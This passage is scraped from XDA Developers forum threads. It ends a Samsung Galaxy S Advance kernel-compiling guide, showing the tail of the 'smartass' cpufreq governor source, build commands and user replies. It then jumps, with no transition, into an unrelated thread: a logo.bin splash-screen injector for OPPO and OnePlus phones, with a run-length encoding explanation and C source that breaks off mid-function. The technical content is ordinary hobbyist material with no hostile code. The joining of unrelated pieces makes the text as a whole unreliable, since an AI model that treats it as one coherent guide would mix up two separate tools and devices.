max_cpu_load = input;
return res;
}
static struct freq_attr max_cpu_load_attr = __ATTR(max_cpu_load, 0644,
show_max_cpu_load, store_max_cpu_load);
static ssize_t show_min_cpu_load(struct cpufreq_policy *policy, char *buf)
{
return sprintf(buf, "%lu\n", min_cpu_load);
}
static ssize_t store_min_cpu_load(struct cpufreq_policy *policy, const char *buf, size_t count)
{
ssize_t res;
unsigned long input;
res = strict_strtoul(buf, 0, &input);
if (res >= 0 && input > 0 && input < 100)
min_cpu_load = input;
return res;
}
static struct freq_attr min_cpu_load_attr = __ATTR(min_cpu_load, 0644,
show_min_cpu_load, store_min_cpu_load);
static struct attribute * smartass_attributes[] = {
&down_rate_us_attr.attr,
&up_min_freq_attr.attr,
&sleep_max_freq_attr.attr,
&sample_rate_jiffies_attr.attr,
&ramp_up_step_attr.attr,
&max_ramp_down_attr.attr,
&max_cpu_load_attr.attr,
&min_cpu_load_attr.attr,
NULL,
};
static struct attribute_group smartass_attr_group = {
.attrs = smartass_attributes,
.name = "smartass",
};
static int cpufreq_governor_smartass(struct cpufreq_policy *new_policy,
unsigned int event)
{
unsigned int cpu = new_policy->cpu;
int rc;
struct smartass_info_s *this_smartass = &per_cpu(smartass_info, cpu);
switch (event) {
case CPUFREQ_GOV_START:
if ((!cpu_online(cpu)) || (!new_policy->cur))
return -EINVAL;
if (this_smartass->enable) /* Already enabled */
break;
/*
* Do not register the idle hook and create sysfs
* entries if we have already done so.
*/
if (atomic_inc_return(&active_count) > 1)
return 0;
rc = sysfs_create_group(&new_policy->kobj, &smartass_attr_group);
if (rc)
return rc;
pm_idle_old = pm_idle;
pm_idle = cpufreq_idle;
this_smartass->cur_policy = new_policy;
this_smartass->cur_policy->max = CONFIG_MSM_CPU_FREQ_ONDEMAND_MAX;
this_smartass->cur_policy->min = CONFIG_MSM_CPU_FREQ_ONDEMAND_MIN;
this_smartass->cur_policy->cur = CONFIG_MSM_CPU_FREQ_ONDEMAND_MAX;
this_smartass->enable = 1;
// notice no break here!
case CPUFREQ_GOV_LIMITS:
if (this_smartass->cur_policy->cur != new_policy->max)
__cpufreq_driver_target(new_policy, new_policy->max, CPUFREQ_RELATION_H);
break;
case CPUFREQ_GOV_STOP:
this_smartass->enable = 0;
if (atomic_dec_return(&active_count) > 1)
return 0;
sysfs_remove_group(&new_policy->kobj,
&smartass_attr_group);
pm_idle = pm_idle_old;
del_timer(&this_smartass->timer);
break;
}
return 0;
}
static void smartass_suspend(int cpu, int suspend)
{
struct smartass_info_s *this_smartass = &per_cpu(smartass_info, smp_processor_id());
struct cpufreq_policy *policy = this_smartass->cur_policy;
unsigned int new_freq;
if (!this_smartass->enable || sleep_max_freq==0) // disable behavior for sleep_max_freq==0
return;
if (suspend) {
if (policy->cur > sleep_max_freq) {
new_freq = sleep_max_freq;
if (new_freq > policy->max)
new_freq = policy->max;
if (new_freq < policy->min)
new_freq = policy->min;
__cpufreq_driver_target(policy, new_freq,
CPUFREQ_RELATION_H);
}
} else { // resume at max speed:
__cpufreq_driver_target(policy, policy->max,
CPUFREQ_RELATION_H);
}
}
static void smartass_early_suspend(struct early_suspend *handler) {
int i;
suspended = 1;
for_each_online_cpu(i)
smartass_suspend(i,1);
}
static void smartass_late_resume(struct early_suspend *handler) {
int i;
suspended = 0;
for_each_online_cpu(i)
smartass_suspend(i,0);
}
static struct early_suspend smartass_power_suspend = {
.suspend = smartass_early_suspend,
.resume = smartass_late_resume,
};
static int __init cpufreq_smartass_init(void)
{
unsigned int i;
struct smartass_info_s *this_smartass;
down_rate_us = DEFAULT_DOWN_RATE_US;
up_min_freq = DEFAULT_UP_MIN_FREQ;
sleep_max_freq = DEFAULT_SLEEP_MAX_FREQ;
sample_rate_jiffies = DEFAULT_SAMPLE_RATE_JIFFIES;
ramp_up_step = DEFAULT_RAMP_UP_STEP;
max_ramp_down = DEFAULT_MAX_RAMP_DOWN;
max_cpu_load = DEFAULT_MAX_CPU_LOAD;
min_cpu_load = DEFAULT_MIN_CPU_LOAD;
suspended = 0;
/* Initalize per-cpu data: */
for_each_possible_cpu(i) {
this_smartass = &per_cpu(smartass_info, i);
this_smartass->enable = 0;
this_smartass->force_ramp_up = 0;
this_smartass->time_in_idle = 0;
this_smartass->idle_exit_time = 0;
// intialize timer:
init_timer_deferrable(&this_smartass->timer);
this_smartass->timer.function = cpufreq_smartass_timer;
this_smartass->timer.data = i;
}
/* Scale up is high priority */
up_wq = create_rt_workqueue("ksmartass_up");
down_wq = create_workqueue("ksmartass_down");
INIT_WORK(&freq_scale_work, cpufreq_smartass_freq_change_time_work);
register_early_suspend(&smartass_power_suspend);
return cpufreq_register_governor(&cpufreq_gov_smartass);
}
#ifdef CONFIG_CPU_FREQ_DEFAULT_GOV_SMARTASS
pure_initcall(cpufreq_smartass_init);
#else
module_init(cpufreq_smartass_init);
#endif
static void __exit cpufreq_smartass_exit(void)
{
cpufreq_unregister_governor(&cpufreq_gov_smartass);
destroy_workqueue(up_wq);
destroy_workqueue(down_wq);
}
module_exit(cpufreq_smartass_exit);
MODULE_AUTHOR ("Erasmux");
MODULE_DESCRIPTION ("'cpufreq_smartass' - A smart cpufreq governor");
MODULE_LICENSE ("GPL");
G. open "include/linux/cpufreq.h"
H. Under the "Cpufreq Default" section add
Code:
#elif defined(CONFIG_CPU_FREQ_DEFAULT_GOV_SMARTASS)
extern struct cpufreq_governor cpufreq_gov_smartass;
#define CPUFREQ_DEFAULT_GOVERNOR (&cpufreq_gov_smartass)
Ok there is a governor added, do the exact same steps for any other one's you would like to add.
The above steps explained:
A. Just opening a file, you guys have this. The Kconfig ties into our "make menuconfig" command later, making our mod a selectable option.
B. Adding the appropriate code for our governor to get it in our .config file. The first chunk would allow us to set our governor as the default one for our kernel, the other allows us to totally remove or add it to the build as we wish.
C-D. This step tells the linker to tie our module in with the rest of the code.
E-F. Creating the actually governor itself, don't skip this step. I would suggest reading through this and trying to understand how it works, it's some pretty awesome stuff.
G-H. Open a file and add the code needed to tie our module into the rest of the source. Without this we would not be able to compile due to the rest of the source not knowing our module exists.
Click to expand...
Click to collapse
Click to expand...
Click to collapse
IV. Getting a Config File :
Samsung now doesn't support grabbing the kernel config from "/proc/config". So we have the alternative method of using the stock config from "/arch/arm/config". Use the README to get a better understanding of how the config file works.
Click to expand...
Click to collapse
V. Building :
Time to start the real "build" section of this tutorial.
Part A. Pre-build Steps
A. Open terminal and change to the root of your kernel directory
B. Type "export ARCH=arm"
C. Type "export CROSS_COMPILE=~/android/kernel/toolchains/arm-eabi-linaro-4.6.2/bin/arm-eabi-"
Part B. The First Build
A. Type "make <your_config_name>_defconfig"
B. Type "make menuconfig" and make the required changes to use any modules you added or similar changes.
C. Type "make -j<maximum number of jobs>"
Part C. Re-Builds
A. Type "make clean"
B. Type "make oldconfig"
C. Type "make -j<maximum number of jobs>"
Part D. Building Modules
You have two options:
A. Type "make modules"
B. Type "make path/to/your/module.ko"
Alternatively, you can use this build script here[/URL.]
Click to expand...
Click to collapse
Above steps explained :
Part A.(These steps are required every time you close your terminal and re-open it to build again.)
A. Ok shouldn’t need to explain this.
B. This command sets your target architecture.
C. Defines the path to the toolchain we are going to use to compile our kernel. You can change this to point towards whatever toolchain you have downloaded or feel like using, the way it is currently configured it will use the Linaro toolchain that we downloaded above.
Part B.(These only need to be run the first time you build a kernel.)
A. Load's your configuration file from earlier.
B. Open up a menu to configure your kernel. It will use the config file you loaded in the previous step as a base.
C. Viola start the build. I typically allow 1 job per core, so on my quad core machine I put "make -j4". Just raising that number will not make your build faster, your processor needs to be able to support the number of jobs you are assigning it.
Part C. (Use the command's when you are building any-time outside of the first)
A. This command gets rid of any old/outdated binaries or modules you compiled before, and let's start fresh. I like to run it every I build unless my changes are really small and localized.
B. A very awesome command, it parses through what has changed and only prompts you about new options.
C. See the explanation for the above "Part C.".
Part D.(Use these for just building kernel modules.)
A. This will re-build all modules.
B. Will rebuild just the module you need. Very useful when you need to rebuild a WiFi module.
Click to expand...
Click to collapse
Click to expand...
Click to collapse
VI. Now What ?
Ok we have now started our build and we are waiting for it to finish, so there are two possible outcomes:
Outcome A. Build Succeds
W00t!! You have a kernel built by your self from source. There are a couple things you need in-order to use this kernel on your device any ".ko" modules and the zImage binary. If you pay attention to the output of your compiler then you will see the location of those objects. However the following commands will make your life a bit easier(Thanks Recognized Developer Hacre):
A. Open a terminal
B. Change to your root kernel directory
C. Type "mkdir ../<your_kernel>_output"
D. Type "cp arch/arm/boot/zImage ../<your_kernel>_output/zImage"
E. Type "find . -name "*.ko" -exec cp {} ../<your_kernel>_output \;"
The above steps explained:
A-C. Self-Explanatory
D. Move our kernel binary into our output folder
E. This handy bit of magic finds all ".ko" modules and also copies them into your output file.
You will also need to assemble a kernel image containing a initramfs for your device, along with the kernel binary and such. Getting the ramdisk from a bin file isn't really easy, but i have attached a script that should do the work. Just remove the .txt extension and chmod it to a+x.
Click to expand...
Click to collapse
Outcome B : Build Fails
Oh dear. It failed. Well guess what...this is going to happen..a LOT. Get used to it, and get used to googling and experimenting with different solutions. The following are some tips that will help you with debugging your issues.
Running a "Clean" build
A. Backup your config file(Type "cp .config ../backupConfig")
B. Re-run the build process using just your defconfig from earlier.
Limiting Output(Thanks Hacre.)
A. Another good tip is to run "make -j1" to get the error, as it will limit the amount of text you need to scroll through.
Click to expand...
Click to collapse
Click to expand...
Click to collapse
While the kernel is compiling, it should show something like this :
When the kernel compile is complete, it should show something like this :
Tips :
I. In the defconfig file, remove the SHRM file signature verification or RIL won't work.
II. Use "make menuconfig" to access a GUI and modify the kernel parameters.
FAQ's :
Q. Can i downgrade the device if i upgrade it to JB ?
A. Yes. You can. There is a detailed guide in the development section. Please refer it before posting.
Credits :
thewadegeek form whose kernel compiling guide, i copy pasted loads of stuff
users for their support
Click to expand...
Click to collapse
Feel something is missing ? Please let me know. I will be happy to update the guide.
Good job dude , keep up u r doing great , thanks lot ^_*
Can I flash whole XXLPZ via odin the same way? Coz my ota doesn't show any update.
And will the root method work then too?
Sent from my GT-I9070 using xda premium
atishey23 said:
Can I flash whole XXLPZ via odin the same way? Coz my ota doesn't show any update.
And will the root method work then too?
Sent from my GT-I9070 using xda premium
Click to expand...
Click to collapse
yes and yes. worked for me, improved performance for me
i think they should pin this thread
popup error
after i flash xxlpz via odin it reboots perfectly and stuck at language chooser. cant finish setup because of popup error "unfortunately com.google.process has stopped" any fix?
Одг: [REF] The All In One Guide for SGSA
ianmcgui said:
after i flash xxlpz via odin it reboots perfectly and stuck at language chooser. cant finish setup because of popup error "unfortunately com.google.process has stopped" any fix?
Click to expand...
Click to collapse
Read a bit!
http://forum.xda-developers.com/showthread.php?p=37246645
Sent from Galaxy S Advance
thanks...good going
thanks, waiting for more :good:
OP updated.
perfect guide
gr8 work.................. i wish i could find this type of guide before i root 1st time so that my binary count wont increase
btw there is any other way for zero binary count??? (i know about triangle away & jib and try both on my sgsa but dont work
and i have 1 problem if u have sol. than plz reply.. in my sgsa "wap setting" can not be installed which is sent by service providers (i.e bsnllive , docomo divein etc) it gives me unable to read
any one having this type of problem???/
great guide..btw i have a problem.. i have installed everything and when i perform a task the terminal want the password which i cant seem to be able to input! i cant do anything because of that! any workaround?
Brainiac.shri said:
great guide..btw i have a problem.. i have installed everything and when i perform a task the terminal want the password which i cant seem to be able to input! i cant do anything because of that! any workaround?
Click to expand...
Click to collapse
Since you don't state it clearly, i guess that you are talking about the commands in Ubuntu!
When you enter the password in the Ubuntu terminal, it isn't showed for security reasons.
So, just type the password and press enter!
Sent from my GT-I9070 using xda premium
Shaaan said:
Since you don't state it clearly, i guess that you are talking about the commands in Ubuntu!
When you enter the password in the Ubuntu terminal, it isn't showed for security reasons.
So, just type the password and press enter!
Sent from my GT-I9070 using xda premium
Click to expand...
Click to collapse
nope! doesnt work! but still logged into ubuntu and tried again and still not working. i remember the password(i just used it to log into the OS) just do not see the problem!
EDIT: doesnt work for certain commands! i tried rooting it just for fun and there the password was accepted just fine!
Frankly speaking after spending a lot of time on XDA, I feel like Developing something for our dear phone! So like which is easier, safer and/or quicker to develop.. A Kernel or a Custom ROM..?
If Kernel.. how can I do that? Download stock kernel and modify it?
If ROM.. where to start? Download the firmware and start modifying it?
PS: I'm not trolling... I'm serious
Sami Kabir said:
Frankly speaking after spending a lot of time on XDA, I feel like Developing something for our dear phone! So like which is easier, safer and/or quicker to develop.. A Kernel or a Custom ROM..?
If Kernel.. how can I do that? Download stock kernel and modify it?
If ROM.. where to start? Download the firmware and start modifying it?
PS: I'm not trolling... I'm serious
Click to expand...
Click to collapse
Step by step ROM making guide. Heat up your PC chair by reading!!! But, as I know you - you will ask for explanation.
http://forum.xda-developers.com/showthread.php?t=1801690

[MOD][CM12][COLOROS 2][HYDROGEN OS] Splash Screen Image Injector v1.2

This is a program that I wrote to decode the newer style "logo.bin" files used in some OPPO, and OnePlus devices. Please read below so you can better understand this type of encoding being used:
What Is A Raw Image?
A raw image, whether it be a file or an image in memory, is simply pixel data. There is no extra information like width, height, name, end of line... Absolutely nothing, just pixel data. If you have an image that is raw and the resolution is 1080x1920 and you are using a typical RGB24 or BGR24 (like the ones used here), then your exact filesize or size in memory will be 1080x1920x3! We use 3 here because there is one byte for the R or red component, one for the G (green), and one for the B(blue).
What Is A Run Length Encoded Image?
A run length image encoding uses a count ;usually a single byte (char), 2 bytes (short int), or 4 bytes (long int); and then the pixel components. So instead of writing out 300 bytes of '0's to make a line of 100 black pixels. Black is RGB(0,0,0). You could encode this as 100, 0, 0, 0. And only use 4 bytes of data to get the exact same image as the 300 byte raw image. All the run length encoding I've found, except the Motorola style which is a little different, use a run length encoding that is pixel-oriented like this.
Now I've figured out this new one and it is a byte-oriented run length encoding. This is for runs of bytes, not pixels. You may think, well whats the big deal? When you add a little area of color, you increase the run length encoded image in you logo.bin immensely! You use 6 bytes per pixel if there aren't any runs of color data. If you had an image that was a 1080x1920 black image with a 25 pixel wide, by 25 pixel high red box in the middle. The encoder would be doing runs of black data efficiently until it reached the red area.
.....0 255 0 255 0 255 0 255 0 255 0 99 /// we've reached the top left corner of the red square /// 13 1 30 1 255 1 // << that was just one red pixel!! in bgr color order (13, 30, 255) <<// And it keeps going through the rest of the red pixels on that line using 6 bytes per pixel, which is the opposite of compression. Before reaching the red square the encoding was decoding to 255 zeros over and over, until finally 99 zeros. 255 zeros is 85 black pixels stored in just 2 bytes!
This type of encoding is only good for grey scale images. It is not good with color, but it still will handle color of course. In grey scale, the Red, Blue, and Green data components are always the same values. All the way from black (0,0,0) to white (255, 255, 255); including every shade of grey in between>>>(1,1,1) (2,2,2) (3,3,3)....(253, 253, 253) (254, 254, 254)<<<
One other difference in this method of run length encoding is that the color byte is before the count, which is backwards from all of the other methods.​
The attachment contains the C source code (which is also in the 2nd post) and the executable that was compiled using mingw32 on a 64 bit Windows 7 PC. The PNG library that I used is LodePng, the source is in the download.
To use logoinjector:
Decode your logo.bin:
Code:
logoInjector.exe -i logo.bin -d
All the PNG 's will be extracted from logo.bin. Edit the PNGs that you want to change...
Note:
Your original "logo.bin" file is never changed, it is just read. If the file you try to load isn't a logo.bin file, or if it is the older style, then the program will tell you and exit​
Inject the image(s) back in to the logo.bin:
Code:
logoinjector.exe -i logo.bin -j image_name_1 image_name_3....
To list whats in your logo file:
Code:
logoinjector.exe -i logo.bin -l
For a more detailed list:
Code:
logoinjector.exe -i logo.bin -L
If the colors are messed up use the "-s" switch while decoding.
Code:
logoinjector.exe -i logo.bin -d -s
If you had to use the "-s" switch to decode properly, you'll have to use it to inject also:
Code:
logoinjector.exe -i logo.bin -j image_name -s
Note:
With version 1.2, you can put as many names after "-j" as you want, and it's not case sensitive. You also don't have to put the whole name. If you just put "-j fhd" every image in the logo.bin that starts with "fhd" will be injected. There has to be a PNG with the name in the directory though​
The size of your modified.logo.bin will displayed along with the original size, if everything went good. Please know the size of you logo partition. I made this program to encompass any device using this format, and there is no set size of the logo partition between devices. Fastboot will just error out if you try to flash data bigger than the partition before it writes anything. But if someone gets brave and tries to "DD" to the logo partition, it could get ugly.:cyclops:
Flash the "modified.logo.bin" file through fastboot.
v1.2
made it possible for multiple injections in one command
doesn't add png to the decoded png if it was already in the name
fixed out of scope with image 26 in OPPO find 7 logo.bin
added LodePng source in the download
made the default color order BGR
displays the modified logo file size as well as the original file size
runs the modified.logo.bin back through the list function after injecting
checks the number of offsets between the original and modified logo.bin
Use this at your own risk.
Always make backups.
Always.
Code:
/*
/*
* Logo Injector v1.2
*
* Copyright (C) 2015 Joseph Andrew Fornecker
* makers_mark @ xda-developers.com
* [email protected]
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 3 of the License, or (at your
* opinion) any later version. See <http://www.gnu.org/licenses/gpl.html>
*
* New in v1.2:
*
* - Fixed out of scope crash involving image #26 in oppo find 7 logo.bin (26 IS BIG)
* - Multiple injection names possible after the -j parameter
* - Injection names are now case insensitive
* - BGR is the the default color order, instead of RGB
* - Added more error checks
* - Show the change in file size of original logo.bin compare to the modified logo.bin
* - Several small changes dealing with readability
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdint.h>
#include "lodepng.h"
#define SWAP32(x) (( x >> 24 )&0xff) | ((x << 8)&0xff0000) | ((x >> 8)&0xff00) | ((x << 24)&0xff000000)
#define BLOCK 512
#define OFFSETSTART 48
#define BYTESPERPIXEL 3
#define MAXOFFSETS 28
#define SIZEOFLONGINT 4
#define TWOTOTHETEN 1024
typedef struct {
uint8_t header[8];
uint8_t blank[24];
uint32_t width;
uint32_t height;
uint32_t lengthOfData;
uint32_t special;
uint32_t offsets[MAXOFFSETS];
uint8_t name[64];
uint8_t metaData[288];
} IMAGEHEAD;
uint16_t Copy(FILE *, IMAGEHEAD *, uint16_t , uint16_t, FILE *);
int32_t InjectNewStyle(FILE *, IMAGEHEAD *, uint16_t , uint8_t *, uint16_t, FILE *, uint32_t * );
int32_t RewriteHeaderZero( uint32_t , uint16_t, FILE* , int32_t, uint32_t * );
uint32_t Encode(uint8_t*, uint8_t*, uint32_t);
uint32_t GetEncodedSize(uint8_t*, uint32_t);
uint32_t GetWidth(FILE*);
uint32_t GetHeight(FILE*);
uint64_t BlockIt(uint32_t);
uint16_t GetNumberOfOffsets(FILE*);
int32_t DecodeLogoBin(FILE*, IMAGEHEAD *);
int32_t ListFileDetails(FILE*, IMAGEHEAD *);
uint8_t* Decode(FILE*, uint32_t, uint32_t, uint32_t, uint8_t*);
int32_t IsItTheNewStyle(FILE*);
IMAGEHEAD* ParseHeaders(FILE*, uint16_t);
int32_t IsItALogo(FILE*);
void PrintFileSize(uint32_t);
uint32_t GetFileSize(FILE *);
uint16_t badAss = 0;
int16_t rgb2bgr = 1;
uint16_t convertToPNG = 1;
uint8_t HEADER[] = {0x53,0x50,0x4C,0x41,0x53,0x48,0x21,0x21};
int32_t IsItALogo(FILE *originalLogoBin){
uint8_t string[9];
uint16_t i;
fread(string, 1, 8, originalLogoBin);
for (i = 0 ; i < 8 ; i++){
if (string[i] == HEADER[i]){
continue;
} else {
return 0;
}
}
return 1;
}
int32_t IsItTheNewStyle(FILE *originalLogoBin){
int32_t newStyle = 0;
fread(&newStyle, 1, SIZEOFLONGINT, originalLogoBin);
if (newStyle == 0){
return 1;
} else {
return 0;
}
}
IMAGEHEAD *ParseHeaders(FILE *originalLogoBin, uint16_t numberOfOffsets){
uint8_t i = 0;
IMAGEHEAD *imageHeaders;
imageHeaders = malloc(BLOCK * numberOfOffsets);
memset(imageHeaders, 0, BLOCK * numberOfOffsets);
fseek(originalLogoBin, 0, SEEK_SET);
fread(&imageHeaders[i], 1 , BLOCK, originalLogoBin);
for ( i = 1 ; i < numberOfOffsets ; ++i ){
fseek(originalLogoBin, imageHeaders[0].offsets[i], SEEK_SET);
fread(&imageHeaders[i], 1 , BLOCK, originalLogoBin);
}
return imageHeaders;
}
uint16_t GetNumberOfOffsets(FILE *originalLogoBin){
uint16_t i = 0;
uint32_t readAs = 0;
fseek(originalLogoBin, OFFSETSTART, SEEK_SET);
while(i < MAXOFFSETS){
fread(&readAs, 1, SIZEOFLONGINT, originalLogoBin);
if ((readAs == 0) && (i != 0)){
break;
} else {
i++;
}
}
return i;
}
uint8_t* Decode(FILE *originalLogoBin, uint32_t start, uint32_t length, uint32_t imageBytes, uint8_t* image){
uint32_t decodedBytes = 0, i = 0;
uint8_t* data;
fseek(originalLogoBin, start, SEEK_SET);
data = (uint8_t*)malloc(length);
if (fread(data, 1, length, originalLogoBin) != length) {
fprintf(stderr, "Could not read file!!\n");
exit(0);
}
while((i < length) && (decodedBytes < imageBytes)){
memset(&image[decodedBytes], data[i], (data[i + 1]));
decodedBytes += (uint8_t)data[i+1];
i += 2;
if ((i < length) && (imageBytes - decodedBytes < (uint8_t)data[i + 1])){
memset(&image[decodedBytes], data[i], imageBytes - decodedBytes);
decodedBytes = imageBytes;
fprintf(stdout, "More information was in encoding than resolution called for.\n");
break;
}
}
fprintf(stdout, "%ld decoded bytes\n", decodedBytes);
free(data);
if( rgb2bgr == 1 ){
uint8_t old;
i = 0;
while( i < imageBytes){
old = image[i];
memset(&image[i], image[i + 2], 1);
memset(&image[i + 2], old, 1);
i += BYTESPERPIXEL;
}
}
return image;
}
int32_t DecodeLogoBin(FILE *originalLogoBin, IMAGEHEAD *imageHeaders){
uint32_t size, imageBytes, start;
uint8_t* image;
uint8_t name[65];
uint8_t r = 0;
uint16_t i , numberOfOffsets = GetNumberOfOffsets(originalLogoBin);
for ( i = 0 ; i < numberOfOffsets ; i++ ){
fprintf(stdout,"\n\n\n#%d: Offset:%ld\n", i + 1, imageHeaders[0].offsets[i]);
if ((imageHeaders[i].width == 0) || (imageHeaders[i].height == 0)){
fprintf(stdout, "Placeholder for %s\n", imageHeaders[i].metaData);
continue;
}
fprintf(stdout, "Header=%s\nWidth=%ld\nHeight=%ld\nData Length=%ld\nSpecial=%ld\nName=%s\nMetadata=%s\n",
imageHeaders[i].header, imageHeaders[i].width, imageHeaders[i].height,
imageHeaders[i].lengthOfData, imageHeaders[i].special, imageHeaders[i].name, imageHeaders[i].metaData);
if (convertToPNG){
start = imageHeaders[0].offsets[i] + BLOCK;
imageBytes = imageHeaders[i].width * (imageHeaders[i].height) * BYTESPERPIXEL;
image = malloc(imageBytes);
uint8_t lengthOfName = strlen(imageHeaders[i].name);
uint8_t *ext;
ext = strrchr(imageHeaders[i].name, '.');
if (((ext[1] == 'p') || (ext[1] == 'P')) &&
((ext[2] == 'n') || (ext[2] == 'N')) &&
((ext[3] == 'g') || (ext[3] == 'G')) &&
((ext[0] == '.'))){
sprintf(name, "%s", imageHeaders[i].name);
} else {
sprintf(name, "%s.png", imageHeaders[i].name);
}
lodepng_encode24_file(name, Decode(originalLogoBin, (uint32_t)start, (uint32_t)imageHeaders[i].lengthOfData, (uint32_t)imageBytes, image) , (unsigned)imageHeaders[i].width, (unsigned)imageHeaders[i].height);
free(image);
}
}
return 0;
}
int32_t ListFileDetails(FILE *originalLogoBin, IMAGEHEAD *imageHeaders){
uint32_t i = 0, j = 0;
fseek(originalLogoBin, 0, SEEK_SET);
uint16_t numberOfOffsets = GetNumberOfOffsets(originalLogoBin);
fprintf(stdout, "Resolution\tOffset\tName\n");
fprintf(stdout, "-------------------------------------------------------------\n");
for ( i = 0 ; i < numberOfOffsets ; i++ ){
if ((imageHeaders[i].width == 0) || (imageHeaders[i].height == 0)){
fprintf(stdout, "(placeholder) for %s\n", imageHeaders[i].metaData);
continue;
}
fprintf(stdout,"%dx%d\t", imageHeaders[i].width, imageHeaders[i].height);
if ((imageHeaders[i].width < 1000) && (imageHeaders[i].height <1000)){fprintf(stdout, "\t");}
fprintf(stdout, "%ld\t%s\n", imageHeaders[0].offsets[i], imageHeaders[i].name );
}
return 1;
}
uint16_t Copy(FILE *originalLogoBin, IMAGEHEAD *imageHeaders, uint16_t numberOfOffsets, uint16_t injectionNumber, FILE *modifiedLogoBin){
uint8_t *data;
uint32_t offset, originalOffset;
uint32_t imageSize = BlockIt(BLOCK + imageHeaders[injectionNumber].lengthOfData);
if( imageHeaders[injectionNumber].name[0] == 0){
fprintf(stdout, "Copying \t#%d:(placeholder) %s\n", injectionNumber + 1 , imageHeaders[injectionNumber].metaData);
} else {
fprintf(stdout, "Copying \t#%d:%s\n", injectionNumber + 1 , imageHeaders[injectionNumber].name);
}
data = malloc(imageSize);
memset(data, 0 , imageSize);
fread(data, 1, imageSize, originalLogoBin);
fwrite(data, 1 , imageSize, modifiedLogoBin);
free(data);
}
int32_t InjectNewStyle(FILE *originalLogoBin, IMAGEHEAD *imageHeaders, uint16_t numberOfOffsets, uint8_t *injectionName, uint16_t injectionNumber, FILE *modifiedLogoBin, uint32_t *ihMainOffsets ){
uint32_t encodedSize = 0, actualWritten = 0, imageSize = 0;
uint8_t *data, *header;
int8_t inFileName[69];
int32_t blockDifference;
uint32_t offset, originalOffset;
FILE *pngFile;
sprintf(inFileName, "%s", injectionName);
if (imageHeaders[injectionNumber].special != 1){
fprintf(stdout, "ERROR: \"Special\" is not equal to '1' \nThis would not be safe to flash!\nPlease email logo.bin in question to:\[email protected]\n");
fclose(originalLogoBin);
fclose(modifiedLogoBin);
return 0;
}
if ((pngFile = fopen(inFileName, "rb")) == NULL){
sprintf(inFileName, "%s.png", injectionName);
if ((pngFile = fopen(inFileName, "rb")) == NULL){
fclose(pngFile);
fclose(modifiedLogoBin);
fclose(originalLogoBin);
fprintf(stderr, "%s could not be read\n", inFileName);
return 0;
}
}
IMAGEHEAD new;
memset(new.blank, 0, sizeof(new.blank));
memset(new.metaData, 0, sizeof(new.metaData));
memset(new.offsets, 0, SIZEOFLONGINT * MAXOFFSETS);
strncpy(new.header, HEADER , 8);
strncpy(new.metaData, imageHeaders[injectionNumber].metaData, sizeof(imageHeaders[injectionNumber].metaData));
strncpy(new.name, injectionName, 64);
new.special = 1;
fprintf(stdout, "Injecting\t#%d:%s\n", injectionNumber + 1 , imageHeaders[injectionNumber].name);
if (((new.width = GetWidth(pngFile)) != imageHeaders[injectionNumber].width) && (!badAss)){
fprintf(stderr, "Error: Width of PNG to be injected is %d, it must be %d!\n", new.width, imageHeaders[injectionNumber].width);
fclose(pngFile);
fclose(modifiedLogoBin);
fclose(originalLogoBin);
return 0;
}
if (((new.height = GetHeight(pngFile)) != imageHeaders[injectionNumber].height) && (!badAss)){
fprintf(stderr, "Error: Height of PNG to be injected is %d, it must be %d!\n", new.height, imageHeaders[injectionNumber].height);
fclose(pngFile);
fclose(modifiedLogoBin);
fclose(originalLogoBin);
return 0;
}
uint32_t rawBytes = new.width * new.height * BYTESPERPIXEL;
uint8_t *decodedPNG = malloc(rawBytes);
lodepng_decode24_file(&decodedPNG, (uint32_t*)&new.width, (uint32_t*)&new.height , (const uint8_t*)inFileName);
if (rgb2bgr == 1){
uint8_t old;
uint32_t k = 0;
while( k < rawBytes ){
old = decodedPNG[k];
memset(&decodedPNG[k], decodedPNG[k + 2], 1);
memset(&decodedPNG[k + 2], old, 1);
k += BYTESPERPIXEL;
}
}
encodedSize = GetEncodedSize(decodedPNG, (new.width * new.height * BYTESPERPIXEL));
new.lengthOfData = encodedSize;
uint8_t *rlEncoded = malloc(BlockIt(encodedSize));
memset(rlEncoded, 0, BlockIt(encodedSize));
actualWritten = Encode(decodedPNG, rlEncoded, (new.width * new.height * BYTESPERPIXEL));
blockDifference = (((BLOCK + BlockIt(actualWritten)) - (BLOCK + BlockIt(imageHeaders[injectionNumber].lengthOfData))) / BLOCK);
fwrite(&new, 1 , BLOCK, modifiedLogoBin);
fwrite(rlEncoded, 1 , BlockIt(actualWritten), modifiedLogoBin);
free(decodedPNG);
free(rlEncoded);
RewriteHeaderZero( injectionNumber , numberOfOffsets , modifiedLogoBin , blockDifference, ihMainOffsets);
fclose(pngFile);
return 1;
}
int32_t RewriteHeaderZero( uint32_t injectionImageNumber , uint16_t numberOfOffsets, FILE *modifiedLogoBin , int32_t blockDifference, uint32_t *ihMainOffsets){
uint8_t i, j = injectionImageNumber + 1 ;
uint32_t filePosition = ftell(modifiedLogoBin);
uint32_t offset = 0;
for( ; j < numberOfOffsets; j++){
fseek(modifiedLogoBin, OFFSETSTART + (SIZEOFLONGINT * j), SEEK_SET);
offset = ihMainOffsets[j];
offset += (blockDifference * BLOCK);
fseek(modifiedLogoBin, OFFSETSTART + (SIZEOFLONGINT * j), SEEK_SET);
fwrite(&offset, 1 , SIZEOFLONGINT , modifiedLogoBin);
ihMainOffsets[j] = offset;
}
fseek(modifiedLogoBin, filePosition , SEEK_SET);
return;
}
uint32_t GetEncodedSize(uint8_t* data, uint32_t size){
uint32_t pos = 0, ret = 0;
uint16_t count = 1;
for( pos = 0 ; pos < size ; ++pos , count = 1){
while((pos < size - 1) && (count < 0xFF) && ((memcmp(&data[pos], &data[pos+1], 1)) == 0)){
count++;
pos++;
}
ret += 2;
}
return ret;
}
uint32_t Encode(uint8_t* rawRgbReading, uint8_t* rlEncoded, uint32_t rawSize){
uint32_t writePosition = 0 , readPosition = 0;
uint16_t count = 1;
for( readPosition = 0 ; readPosition < rawSize ; ++readPosition , count = 1){
while((readPosition < rawSize - 1 ) && (count < 0xFF) && ((memcmp(&rawRgbReading[readPosition], &rawRgbReading[readPosition+1], 1)) == 0)){
count++;
readPosition++;
}
rlEncoded[writePosition] = rawRgbReading[readPosition];
rlEncoded[writePosition + 1] = count;
writePosition += 2;
}
return writePosition;
}
uint32_t GetWidth(FILE *pngFile){
uint32_t width;
fseek(pngFile, 16, SEEK_SET);
fread(&width, 1, SIZEOFLONGINT, pngFile);
return(SWAP32(width));
}
uint32_t GetHeight(FILE *pngFile){
uint32_t height;
